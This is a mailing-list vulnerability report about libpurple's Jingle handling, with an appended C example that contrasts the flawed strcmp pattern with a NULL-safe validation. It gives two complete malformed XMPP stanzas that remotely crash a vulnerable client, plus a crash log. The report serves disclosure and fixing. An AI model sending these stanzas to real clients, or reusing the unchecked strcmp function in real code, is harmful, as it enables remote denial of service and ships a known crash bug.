Receipt of an invalid XMPP Jingle "session-initiate" iq missing certain fields causes libpurple to dereference a NULL pointer.

Thijs Alkemade thijs at adium.im
Sun Oct 23 17:49:17 EDT 2011


Hello all,

Sending the following using the XML Console on XMPP in Adium 1.5hg to
another Adium 1.5hg client causes a crash:

---

<iq id='asdf' to='... at xnyhps.nl/...' type='set'>
  <jingle xmlns='urn:xmpp:jingle:1' action='session-initiate'
          initiator='... at xnyhps.nl/...' sid='asdf'>
    <content creator='initiator' name='voice'>
      <description xmlns='urn:xmpp:jingle:apps:rtp:1'>
      </description>
      <transport xmlns='urn:xmpp:jingle:transports:ice-udp:1'>
      </transport>
    </content>
  </jingle>
</iq>

---

And so does:

---

<iq id='asdf' to='... at xnyhps.nl/...' type='set'>
  <jingle xmlns='urn:xmpp:jingle:1' action='session-initiate'
          initiator='... at xnyhps.nl/...' sid='asdf'>
    <content name='voice'>
      <description xmlns='urn:xmpp:jingle:apps:rtp:1' media='audio'>
      </description>
      <transport xmlns='urn:xmpp:jingle:transports:ice-udp:1'>
      </transport>
    </content>
  </jingle>
</iq>

---

Relevant parts of the crash log:

---

Crashed Thread:  0  Dispatch queue: com.apple.main-thread

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x0000000000000008

Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0   libsystem_c.dylib   0x00007fff82e40870 strcmp + 80
1   libpurple           0x0000000100b87f57 jingle_rtp_parse_codecs + 50
2   libpurple           0x0000000100b88149 jingle_rtp_handle_action_internal + 163
3   libpurple           0x0000000100b83e89 jingle_handle_session_initiate + 123
4   libpurple           0x0000000100b83518 jabber_process_packet + 138
5   libpurple           0x0000000100b8d835 jabber_parser_element_end_libxml + 75
6   libxml2.2.dylib     0x00007fff8b5a5d9f 0x7fff8b595000 + 69023
7   libxml2.2.dylib     0x00007fff8b5b16f0 xmlParseChunk + 3276
8   libpurple           0x0000000100b8d6da jabber_parser_process + 116
9   libpurple           0x0000000100b8301c jabber_recv_cb_ssl + 181

---

According to the spec
(http://xmpp.org/extensions/xep-0167.html#schema-content), a
"<description>" element is required to have a "media" attribute, but
that is missing here.
libpurple/protocols/jabber/jingle/rtp.c:jingle_rtp_parse_codecs()
checks with strcmp if the media attribute is "video" or "audio", but
that means it will crash if it is NULL. Also, "<content>" is required
to have a "creator", but excluding that also causes a similar crash
with strcmp in jingle_rtp_init_media().

I have encountered this bug with Adium 1.5hg, which currently uses
libpurple 2.10. I have no reason to assume it doesn't apply to Pidgin
2.10, but I have not been able to test this. There are more uses of
strcmp() in libpurple/protocols/jabber/jingle/rtp.c, but I have not
verified whether those allow similar crashes. As Adium 1.4.3 (the latest
release) doesn't include VV, it won't be vulnerable to this bug (so
fixing this quickly is not a priority for us).

I hope I've given enough information; let me know if you need to know more.

Best regards,
Thijs Alkemade
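The defect the report describes, shown as an added example (this is not libpurple's code and not part of the original mail): a stand-in attribute lookup that returns NULL for a missing attribute, the unchecked strcmp() pattern that crashes on it, and a hardened version that validates the XEP-0167 required attributes ("media" on <description>, "creator" on <content>) before comparing. The `elem_t`/`attr_t` types, the `elem_get_attrib()` helper and the sample elements are constructed assumptions that mirror the two stanzas above; they stand in for the real xmlnode API only so the example runs without libxml2 or glib.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for an XML element's attribute list. */
typedef struct { const char *name; const char *value; } attr_t;
typedef struct { const char *name; const attr_t *attrs; size_t n_attrs; } elem_t;

/* Same contract as an attribute getter: NULL when the attribute is absent.
 * That NULL is exactly what reached strcmp() in the crash above. */
static const char *elem_get_attrib(const elem_t *e, const char *name) {
    for (size_t i = 0; i < e->n_attrs; i++)
        if (strcmp(e->attrs[i].name, name) == 0) return e->attrs[i].value;
    return NULL;
}

typedef enum { MEDIA_AUDIO = 1, MEDIA_VIDEO = 2, MEDIA_INVALID = 0 } media_t;

/* NULL-safe equality (semantics of g_strcmp0(a,b)==0 / purple_strequal()):
 * two NULLs compare equal, NULL never equals a real string. */
static int str_equal0(const char *a, const char *b) {
    if (a == NULL || b == NULL) return a == b;
    return strcmp(a, b) == 0;
}

/* The unchecked pattern from the report: strcmp() straight on the attribute.
 * Calling this with a <description> lacking "media" dereferences NULL. */
static media_t media_type_unchecked(const elem_t *description) {
    const char *media = elem_get_attrib(description, "media");
    if (strcmp(media, "audio") == 0) return MEDIA_AUDIO;
    if (strcmp(media, "video") == 0) return MEDIA_VIDEO;
    return MEDIA_INVALID;
}

/* Hardened form: a missing or unknown "media" yields MEDIA_INVALID so the
 * caller can reject the stanza instead of crashing. */
static media_t media_type_checked(const elem_t *description) {
    const char *media = elem_get_attrib(description, "media");
    if (media == NULL) return MEDIA_INVALID;          /* required by XEP-0167 */
    if (str_equal0(media, "audio")) return MEDIA_AUDIO;
    if (str_equal0(media, "video")) return MEDIA_VIDEO;
    return MEDIA_INVALID;
}

/* Returns 1 when <content> and its <description> carry the attributes
 * XEP-0167 requires, 0 when the session-initiate should be rejected. */
static int validate_content(const elem_t *content, const elem_t *description) {
    const char *creator = elem_get_attrib(content, "creator");
    if (creator == NULL) return 0;                     /* second crash case */
    if (!str_equal0(creator, "initiator") && !str_equal0(creator, "responder"))
        return 0;
    return media_type_checked(description) != MEDIA_INVALID;
}

/* Constructed samples mirroring the two stanzas in the report. */
static const attr_t desc_no_media_attrs[] = { { "xmlns", "urn:xmpp:jingle:apps:rtp:1" } };
static const elem_t desc_no_media = { "description", desc_no_media_attrs, 1 };
static const attr_t desc_audio_attrs[] = { { "xmlns", "urn:xmpp:jingle:apps:rtp:1" },
                                           { "media", "audio" } };
static const elem_t desc_audio = { "description", desc_audio_attrs, 2 };
static const attr_t content_no_creator_attrs[] = { { "name", "voice" } };
static const elem_t content_no_creator = { "content", content_no_creator_attrs, 1 };
static const attr_t content_ok_attrs[] = { { "creator", "initiator" }, { "name", "voice" } };
static const elem_t content_ok = { "content", content_ok_attrs, 2 };

int main(void) {
    /* Only the well-formed element is passed to the unchecked version. */
    printf("unchecked, media=audio: %d\n", media_type_unchecked(&desc_audio));
    printf("checked, media missing: %d\n", media_type_checked(&desc_no_media));
    printf("stanza 1 (media missing) accepted: %d\n",
           validate_content(&content_ok, &desc_no_media));
    printf("stanza 2 (creator missing) accepted: %d\n",
           validate_content(&content_no_creator, &desc_audio));
    printf("well-formed content accepted: %d\n",
           validate_content(&content_ok, &desc_audio));
    return 0;
}
```

Both malformed stanzas are rejected by `validate_content()` without ever reaching strcmp() with a NULL argument; the well-formed pair is accepted. The same check-before-compare discipline applies to every other attribute the rtp.c code compares with strcmp().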
